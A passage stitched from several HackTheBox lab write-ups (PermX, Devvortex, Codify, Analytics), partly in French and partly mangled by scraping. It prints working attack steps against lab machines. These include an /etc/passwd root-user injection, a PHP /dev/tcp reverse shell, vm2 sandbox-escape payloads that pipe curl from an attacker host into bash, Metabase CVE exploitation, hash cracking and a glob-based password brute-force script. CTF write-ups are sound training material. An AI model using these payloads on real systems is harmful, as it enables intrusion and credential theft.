So I changed the permissions of /etc/passwd so that I could modify it as mtz. We add a hacker user, with the password "password", that has root rights. We log in as hacker and display the root.txt file with the flag.

!!WARNING!! there is a crontab that restores /etc/passwd and deletes the symbolic links in /home/mtz, so it has to be done quickly…

$ ln -s /etc/passwd .a && ln -s .a .b && sudo /opt/acl.sh mtz rwx /home/mtz/.b && cat /etc/passwd
# Display /etc/passwd
# Add a hacker user with root rights and the password "password"
$ vi /etc/passwd
...
...
hacker:$6$XbyWNHgUybMiBnVK$FOoR2G.C.YAk0TAzOcf2igmcoVWkJtzDQgs7C4TmE7fazCwasTsutVY.5AR8CkiA7cBcGGx8cHdPtUUdkXOGA1:0:0::/root:/bin/bash
$ su hacker
Password: password
$ cat /root/root.txt
1808.....4142

(Title: HTB | PermX, date: 2024-08-04, permalink: https://leopoldabgn.github.io/writeups/p/permx-htb/)

Machine name | OS    | IP           | Difficulty
Devvortex    | Linux | 10.10.11.242 | Easy

Enumeration

nmap

$ nmap -sC -sV -An -T4 -p- 10.10.11.242
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/

Subdomain enumeration: gobuster

We have to use gobuster to enumerate the subdomains!

└─$ gobuster dns -d devvortex.htb -t 50 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     devvortex.htb
[+] Threads:    50
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/dirb/common.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: dev.devvortex.htb
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Foothold

gobuster dev.devvortex.htb

└─$ gobuster dir -u dev.devvortex.htb -t 50 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.devvortex.htb
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
...
/administrator        (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]
/api                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]
/cache                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cache/]
/components           (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/components/]
/home                 (Status: 200) [Size: 23221]
/images               (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/images/]
/includes             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/includes/]
/index.php            (Status: 200) [Size: 23221]
/language             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/language/]
/layouts              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/layouts/]
/libraries            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/libraries/]
/media                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/media/]
/modules              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/modules/]
/plugins              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/plugins/]
/robots.txt           (Status: 200) [Size: 764]
/templates            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/templates/]
/tmp                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/tmp/]

Administrator page

There is an /administrator page with a login/password form. We can see the name of the tool behind this login page: Joomla!.

The Joomla! version can be found here: http://dev.devvortex.htb/administrator/manifests/files/joomla.xml

Version: 4.2.6

Searching online, we quickly find a CVE for this version of Joomla as well as a github repo that exploits it.

└─$ ruby exploit.rb http://dev.devvortex.htb:80
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

We therefore find the following credentials: user: lewis password: P4ntherg0t1n5r3c0n##

Trying them on the login page works! We then land on a Dashboard.

Dashboard

It turns out this dashboard uses a template, and so does the login page. These are ready-made models, pre-written php code that just has to be imported. From the dashboard, we can edit the templates used for the dashboard and for the login page, including their php code. We can therefore modify the dashboard's php code, for example to execute a bash command and create a reverse shell to get access to the machine.

Reverse shell

We modify the php code of the administration page to create a reverse shell:

<?php
exec('/bin/bash -c "exec nohup bash -i >& /dev/tcp/10.10.14.109/44446 0>&1 &"');
...
?>
-------------------------------------------------------------------------------
~ » nc -lvp 44444                                     leopold@leopold-PC-FIXE
Listening on 0.0.0.0 44444
Connection received on devvortex.htb 53842
bash: cannot set terminal process group (875): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/administrator$ whoami
whoami
www-data

Stable shell

We open a more stable shell with python:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z
stty raw -echo; fg

lewis -> logan: user flag

With lewis's account, we were able to access the website's database and retrieve the credentials of user logan.

www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
mysql> use joomla
mysql> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
.................................
.................................
| sd4fg_usergroups              |
| sd4fg_users                   |
| sd4fg_viewlevels              |
.................................
71 rows in set (0.00 sec)
mysql> select * from sd4fg_users;
.....................................
lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
.....................................
2 rows in set (0.00 sec) hashcat - logan password (getting ssh access) On crack le hash avec rockyou, et on obtient les credentials pour logan: user: logan password : tequieromucho\n1 2 3 4 $ hashcat --help | grep 3200 3200 | bcrypt $2*$, Blowfish (Unix) | Operating System $ hashcat -m 3200 -a 0 -d 1 hash.txt /home/leopold/wordlists/rockyou.txt --show $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho SSH to logan 1 2 3 4 $ ssh logan@localhost Password: tequieromucho logan@devvortex:~$ cat users.txt FLAG................ Privilege Escalation Enumeration 1 2 3 4 5 6 7 8 9 10 logan@devvortex:~$ sudo -l [sudo] password for logan: Sorry, try again. [sudo] password for logan: Matching Defaults entries for logan on devvortex: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User logan may run the following commands on devvortex: (ALL : ALL) /usr/bin/apport-cli Exploit : apport-cli as root 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 logan@devvortex:~$ sudo /usr/bin/apport-cli --file-bug *** What kind of problem do you want to report? Choices: 1: Display (X.org) 2: External or internal storage devices (e. g. USB sticks) 3: Security related problems 4: Sound/audio related problems 5: dist-upgrade 6: installation 7: installer 8: release-upgrade 9: ubuntu-release-upgrader 10: Other problem C: Cancel Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 *** Collecting problem information The collected information can be sent to the developers to improve the application. This might take a few minutes. *** What display problem do you observe? 
Choices: 1: I don\u0026#39;t know 2: Freezes or hangs during boot or usage 3: Crashes or restarts back to login screen 4: Resolution is incorrect 5: Shows screen corruption 6: Performance is worse than expected 7: Fonts are the wrong size 8: Other display-related problem C: Cancel Please choose (1/2/3/4/5/6/7/8/C): 2 *** To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze Press any key to continue... ..dpkg-query: no packages found matching xorg ........... *** Send problem report to the developers? After the problem report has been sent, please fill out the form in the automatically opened web browser. What would you like to do? Your options are: S: Send report (1.4 KB) V: View report K: Keep report file for sending later or copying to somewhere else I: Cancel and ignore future crashes of this program version C: Cancel Please choose (S/V/K/I/C): V !/bin/bash root@devvortex:/home/logan# root@devvortex:/home/logan# cd root@devvortex:~# cat root.txt 8b49.....2438 ","date":"2024-03-23T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/devvortex-htb/","title":"HTB | Devvortex"},{"content":" Machine name OS IP Difficulty Codify Linux 10.10.11.239 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-31 01:27 CET Nmap scan report for 10.10.11.239 Host is up (0.016s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://codify.htb/ 3000/tcp open http Node.js Express framework |_http-title: Codify Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds /etc/hosts On ajoute les noms de domaines necessaire.\n1 2 ## ... 10.10.11.239 dirb, gobuster, dirsearch L\u0026rsquo;endpoint editor semble permettre d\u0026rsquo;executer du javscript et d\u0026rsquo;afficher le resultat.\n1 2 3 4 5 6 7 8 9 10 ┌──(kali㉿kali)-[~/github/dirsearch] └─$ dirbuster Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / - 200 File found: /about - 200 File found: /editor - 200 File found: /limitations - 200 Dir found: /about/ - 200 Foothold Editor : node js sandbox Il y a un \u0026ldquo;editor\u0026rdquo;. C\u0026rsquo;est une sandbox node js, qui permet donc a n\u0026rsquo;importe qui d\u0026rsquo;executer du code node js depuis navigateur en accédant a leur site internet et d\u0026rsquo;obtenir le resultat a l\u0026rsquo;écran. Ils interdisent bien sûr les modules tels que child_process qui permettent d\u0026rsquo;executer du code arbitraire sur la machine.\nCependant, sur la page /about il est précise que l\u0026rsquo;éditeur de code fonctionne grâce à la vm2 library 3.9.16 accompagné d\u0026rsquo;un lien github. 
En tapant sur internet, on trouve tout de suite une vulnérabilité qui permet d\u0026rsquo;important quand meme child_process et donc de pouvoir executer du code arbitraire.\nVoici un PoC(Proof of concept):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 const {VM} = require(\u0026#34;vm2\u0026#34;); const vm = new VM(); const code = ` aVM2_INTERNAL_TMPNAME = {}; function stack() { new Error().stack; stack(); } try { stack(); } catch (a$tmpname) { a$tmpname.constructor.constructor(\u0026#39;return process\u0026#39;)().mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;whoami\u0026#39;); } ` console.log(vm.run(code)); PoC 2:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const {VM} = require(\u0026#34;vm2\u0026#34;); const vm = new VM(); const code = ` err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor(\u0026#39;return process\u0026#39;)().mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;touch pwned\u0026#39;); } ` console.log(vm.run(code)); Ce code permet donc d\u0026rsquo;executer la commande whoami et d\u0026rsquo;afficher le resultat. On observer d\u0026rsquo;ailleurs que l\u0026rsquo;utilisateur qui execute les commandes node js est svc\nExploit : vm2 library 3.9.16 Voici un code pour créer un reverse shell sur la target. Il est stocké dans un fichier index.html.\n1 2 3 ##!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.125/44445 0\u0026gt;\u0026amp;1 On ouvre un server http sur le port 80. Cela va permettre d\u0026rsquo;effectuer un curl depuis la target pour récupérer le code de index.html.\n1 2 3 ~/github/Hacking/HackTheBox/Machines/Codify (main*) » sudo python3 -m http.server 80 1 ↵ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 
10.10.11.239 - - [31/Dec/2023 15:33:13] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - Voici le code pour récupérer le code du reverse shell et l\u0026rsquo;executer : curl 10.10.14.125:80 | bash\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const {VM} = require(\u0026#34;vm2\u0026#34;); const vm = new VM(); const code = ` err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor(\u0026#39;return process\u0026#39;)().mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;curl 10.10.14.125:80 | bash\u0026#39;); } ` console.log(vm.run(code)); On est bien connecté !\n1 2 3 4 5 6 7 8 ~ » nc -lvp 44445 Listening on 0.0.0.0 44445 Connection received on codify.htb 60340 bash: cannot set terminal process group (1254): Inappropriate ioctl for device bash: no job control in this shell svc@codify:~$ ls ls pwned Stable shell On ouvre un shell plus stable en python\n1 2 3 4 5 6 7 8 9 10 svc@codify:~$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; svc@codify:~$ export TERM=xterm export TERM=xterm svc@codify:~$ ^Z [1] + 23986 suspended nc -lvp 44445 ~ » stty raw -echo; fg [1] + 23986 continued nc -lvp 44445 svc@codify:~$ joshua En regardant dans /home, on trouve l\u0026rsquo;utilisateur joshua. 
On va essayer de trouver son mot de passe pour avoir un accès à un compte utilisateur sur la machine cible.\njoshua password : tickets.db 1 2 3 4 svc@codify:~$ curl 10.10.14.125:80/linpeas.sh \u0026gt; linpeas.sh % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 828k 100 828k 0 0 5875k 0 --:--:-- --:--:-- --:--:-- 5914k 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ## On met le resultat de linpeas dans un fichier $ ./linpeas.sh \u0026gt; linpeas_result.txt \u0026amp; ## On fait un grep pour voir les fichiers .db $ cat linpeas_result.txt | grep \u0026#34;.db\u0026#34; Found /var/lib/plocate/plocate.db: regular file, no read permission Found /var/www/contact/tickets.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 17, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 17 -\u0026gt; Extracting tables from /var/lib/command-not-found/commands.db (limit 20) -\u0026gt; Extracting tables from /var/lib/fwupd/pending.db (limit 20) -\u0026gt; Extracting tables from /var/lib/PackageKit/transactions.db (limit 20) -\u0026gt; Extracting tables from /var/www/contact/tickets.db (limit 20) ## On remarque le fichier tickets.db qui semble intéressant svc@codify:~$ cat /var/www/contact/tickets.db �T5��T�format 3@ .WJ otableticketsticketsCREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)��\ttableusersusersCREATE TABLE users ( id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT UNIQUE, password TEXT ��G�joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2 �� ����ua users ickets r]r�h%%�Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? 
A feature like that would be nice.open� ;�wTom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!opensvc@codify:~$ 2024-01-10 17:23:17 TLS Error: local/remote TLS keys are out of sync: [AF_INET]23.106.35.214:1337 [7] Dans ce fichier il y a le hash de l\u0026rsquo;utilisateur joshua\n1 joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2 Second way to find tickets.db A l\u0026rsquo;aide de grep, on peut rechercher tous les fichiers qui contiennent une certaine chaine de caractères. On aurait pu par exemple, faire une recherche récursive de \u0026ldquo;joshua\u0026rdquo; dans tous les fichiers du système cible. On aurait alors trouver facilement le fichier tickets.db.\n1 2 3 4 5 6 7 8 9 10 11 svc@codify:~$ grep -rl \u0026#34;joshua\u0026#34; / 2\u0026gt; /dev/null /run/systemd/transient/session-c1.scope /run/systemd/users/1000 /run/systemd/sessions/c1 /var/cache/apt/srcpkgcache.bin /var/cache/apt/pkgcache.bin /var/www/contact/tickets.db # ICI /var/lib/apt/lists/lk.archive.ubuntu.com_ubuntu_dists_jammy_universe_binary-amd64_Packages /var/lib/apt/lists/lk.archive.ubuntu.com_ubuntu_dists_jammy_universe_i18n_Translation-en /var/log/wtmp /var/log/journal/08b7d40fcb5444a9baa8b47d27502d2d/user-1001.journal Cracking joshua hash | john A l\u0026rsquo;aide de john, on tente de cracker le hash du mot de passe de joshua\n1 2 3 4 5 6 7 8 9 10 11 $ john --wordlist=~/wordlists/rockyou.txt joshua_hash.txt Loaded 1 password hash (bcrypt [Blowfish 32/64 X2]) Will run 8 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status spongebob1 (?) 
```console
1g 0:00:00:38 100% 0.02606g/s 36.27p/s 36.27c/s 36.27C/s teacher..atlanta
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

So joshua's password is spongebob1.

### User flag: SSH joshua

```console
$ ssh joshua@10.10.11.239
The authenticity of host '10.10.11.239 (10.10.11.239)' can't be established.
ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.239' (ED25519) to the list of known hosts.
joshua@10.10.11.239's password: *******
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
...
Last login: Wed Jan 10 16:35:11 2024 from 10.10.14.159
joshua@codify:~$ whoami
joshua
joshua@codify:~$ ls
user.txt
joshua@codify:~$ cat user.txt
3c02.....ef98
```

## Privilege Escalation

### mysql-backup.sh as root

```console
joshua@codify:~$ sudo -l
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh
```

We notice we are allowed to run /opt/scripts/mysql-backup.sh as root.

```bash
$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
```

There is a problem in the if: the variables are not quoted. Inside `[[ ]]`, an unquoted right-hand operand of `==` is treated as a glob pattern rather than a literal string, so wildcards in our input are matched against the real password. That lets us brute-force the password one character at a time.

```bash
if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi
```

```python
import subprocess

def execute_command(command, password):
    # Feed the guess followed by "*" to the script's read prompt
    command = f'echo "{password}*" | {command}'
    result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    return result.stdout.strip()

def brute_force_password():
    command = "/opt/scripts/mysql-backup.sh"
    charset = 'abcdefghijklmnopqrstuvwxyz123456789'
    password_length = 21
    password = ""

    for i in range(password_length):
        for c in charset:
            p = password + c
            output = execute_command(command, p)
            if "Password confirmed!" in output:
                print(f"Letter found: {p}")
                password += c
                break

if __name__ == "__main__":
    brute_force_password()
```
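To show the quoting defect on its own, here is an added example (not the writeup's code, and using a constructed placeholder secret rather than the machine's): the comparison exactly as mysql-backup.sh writes it, beside the quoted form that makes bash compare the two strings literally, so a wildcard guess no longer passes.

```bash
#!/bin/bash
# Added example, not part of the original writeup.
# Inside [[ ]], an unquoted right-hand operand of == is a glob pattern,
# so a guess such as "s3*" matches any secret beginning with "s3" and a
# bare "*" matches every secret. Quoting the operand disables pattern
# matching and forces a literal string comparison.

# Re-exec under bash if started with a plain POSIX sh ([[ ]] is bash-only).
if [ -z "$BASH_VERSION" ]; then exec bash "$0" "$@"; fi

# Constructed placeholder secret; not the machine's real credential.
DB_PASS='s3cr3t-placeholder'

# Vulnerable form, as written in the original script: the guess is
# interpreted as a pattern. Prints "yes" when the pattern matches DB_PASS.
check_vulnerable() {
    local guess=$1
    if [[ $DB_PASS == $guess ]]; then echo yes; else echo no; fi
}

# Hardened form: with the right-hand side quoted, only the exact
# secret is accepted; "*" and "s3*" are just characters.
check_fixed() {
    local guess=$1
    if [[ "$DB_PASS" == "$guess" ]]; then echo yes; else echo no; fi
}

# Side-by-side demonstration of the same guesses against both checks.
main() {
    local g
    for g in 's3*' '*' 'x*' "$DB_PASS"; do
        printf 'guess %-22s vulnerable=%-3s fixed=%s\n' \
            "\"$g\"" "$(check_vulnerable "$g")" "$(check_fixed "$g")"
    done
}

main "$@"
```

Running it prints yes/yes only for the exact secret under the fixed check, while the vulnerable check also accepts "s3*" and "*", which is precisely what the character-by-character brute force above relies on.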
__name__ == \u0026#34;__main__\u0026#34;: brute_force_password() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 bruteforce.py user.txt joshua@codify:~$ python3 bruteforce.py Letter found: k Letter found: kl Letter found: klj Letter found: kljh Letter found: kljh1 Letter found: kljh12 Letter found: kljh12k Letter found: kljh12k3 Letter found: kljh12k3j Letter found: kljh12k3jh Letter found: kljh12k3jha Letter found: kljh12k3jhas Letter found: kljh12k3jhask Letter found: kljh12k3jhaskj Letter found: kljh12k3jhaskjh Letter found: kljh12k3jhaskjh1 Letter found: kljh12k3jhaskjh12 Letter found: kljh12k3jhaskjh12k Letter found: kljh12k3jhaskjh12kj Letter found: kljh12k3jhaskjh12kjh Letter found: kljh12k3jhaskjh12kjh3 1 2 3 4 5 joshua@codify:~$ su root Password: root@codify:/home/joshua# cd root@codify:~# cat root.txt 4029.....7333 ","date":"2024-01-10T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/codify-htb/","title":"HTB | Codify"},{"content":" Machine name OS IP Difficulty Analytics Linux 10.10.11.233 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- 10.10.11.233 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA) |_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://analytical.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Foothold /etc/hosts On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu\u0026rsquo;il y a également le nom de domaine: data.analytical.htb\n1 2 3 ## ... 10.10.11.233 analytical.htb 10.10.11.233 data.analytical.htb Metabase CVE La machine semble utiliser metabase. 
En recherchant sur internet: metabase CVE.\nOn trouve tout de suite une vulnérabilité de 2023 exploitable assez facilemement pour la version de metabase installée.\nJ\u0026rsquo;ai cloné un repo github avec la Proof of concert (PoC) ainsi qu\u0026rsquo;un autre script pour exploiter la vulnérabilité et ouvrir un shell.\n1 2 3 4 5 6 ┌──(kali㉿kali)-[~/…/HackTheBox/Machines/Analytics/CVE-2023-38646] └─$ python3 CVE-2023-38646-POC.py --ip data.analytical.htb Failed to connect using HTTPS for data.analytical.htb. Trying next protocol... None. Vulnerable Metabase Instance:- IP: data.analytical.htb Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f D\u0026rsquo;après la CVE, si un setup Token est présent sur la page /api/session/properties, alors la machine est vulnérable.\nMetabase Exploit - Reverse Shell Grâce aux deuxième script, on a réussi à ouvrir shell :\n1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/…/HackTheBox/Machines/Analytics/CVE-2023-38646] └─$ python3 CVE-2023-38646-Reverse-Shell.py --rhost data.analytical.htb --lhost 10.10.14.125 --lport 44444 [DEBUG] Original rhost: data.analytical.htb [DEBUG] Preprocessed rhost: http://data.analytical.htb [DEBUG] Input Arguments - rhost: http://data.analytical.htb, lhost: 10.10.14.125, lport: 44444 [DEBUG] Fetching setup token from http://data.analytical.htb/api/session/properties... [DEBUG] Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f [DEBUG] Version: v0.46.6 ... Sur la kali, on a un deuxième terminal avec un nc ouvert :\n1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/github/dirsearch] └─$ nc -lvp 44444 listening on [any] 44444 ... 
connect to [10.10.14.125] from analytical.htb [10.10.11.233] 53506 bash: cannot set terminal process group (1): Not a tty bash: no job control in this shell d7bb30f10313:/$ whoami whoami metabase Enumeration (linPEAS) Pour faire un recherche plus poussé sur la machine avec le compte accessible, on va utilisé l\u0026rsquo;outil linPEAS:\n1 2 3 4 5 6 7 8 # KALI: On télécharge linPEAS.sh depuis la page \u0026#34;releases\u0026#34; du dépôt github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh \u0026gt; linpeas.sh # KALI: On ouvre le port 80 à l\u0026#39;aide de python sur la machine hôte sudo python3 -m http.server 80 # CIBLE: On récupère linPEAS.sh depuis la machine cible en se connectant sur le port 80 avec wget wget 10.10.14.125:80/linPEAS.sh Après l\u0026rsquo;execution de linPEAS, on a pu trouver un utilisateur et un mot de passe:\n1 2 3 4 5 # $ env ... META_USER=metalytics META_PASS=An4lytics_ds20223# ... SSH as metalytics On peut désormais se connecter en ssh avec le compte utilisateur trouvé:\n1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/Hacking/HackTheBox/Machines/Analytics] └─$ ssh metalytics@10.10.11.233 metalytics@10.10.11.233\u0026#39;s password: Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64) ... ... Last login: Sat Dec 30 17:28:13 2023 from 10.10.14.99 metalytics@analytics:~$ cat user.txt 8102.....9b97 Privilege Escalation GameOverlay Exploit : CVE-2023–32629 On a executé a nouveau un linPEAS sur la machine sans grand succès. Cependant, on a trouvé la version qui tourne sur la machine: Ubuntu 22.04.3.\nAprès quelques recherches sur internet on a trouvé une faille exploitable dans cette version d\u0026rsquo;ubuntu expliqué ici : https://medium.com/@0xrave/ubuntu-gameover-lay-local-privilege-escalation-cve-2023-32629-and-cve-2023-2640-7830f9ef204a\nIl s\u0026rsquo;agit de la CVE-2023–32629. 
Il y a 3 commandes a écrire sur la machine pour vérifier si elle est vulnérable:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 metalytics@analytics:~$ lsmod | grep overlay overlay 188416 1 metalytics@analytics:~$ modinfo overlay filename: /lib/modules/6.2.0-25-generic/kernel/fs/overlayfs/overlay.ko alias: fs-overlay license: GPL description: Overlay filesystem author: Miklos Szeredi \u0026lt;miklos@szeredi.hu\u0026gt; srcversion: 851BCABACE90D7C44199412 depends: retpoline: Y intree: Y name: overlay vermagic: 6.2.0-25-generic SMP preempt mod_unload modversions sig_id: PKCS#7 signer: Build time autogenerated kernel key sig_key: 03:91:76:66:F0:D5:23:99:A0:4F:17:5E:BD:A8:42:D6:08:A9:5F:71 sig_hashalgo: sha512 signature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parm: check_copy_up:Obsolete; does nothing parm: redirect_max:Maximum length of absolute redirect xattr value (ushort) parm: redirect_dir:Default to on or off for the redirect_dir feature (bool) parm: redirect_always_follow:Follow redirects even if redirect_dir feature is turned off (bool) parm: index:Default to on or off for the inodes index feature (bool) parm: nfs_export:Default to on or off for the 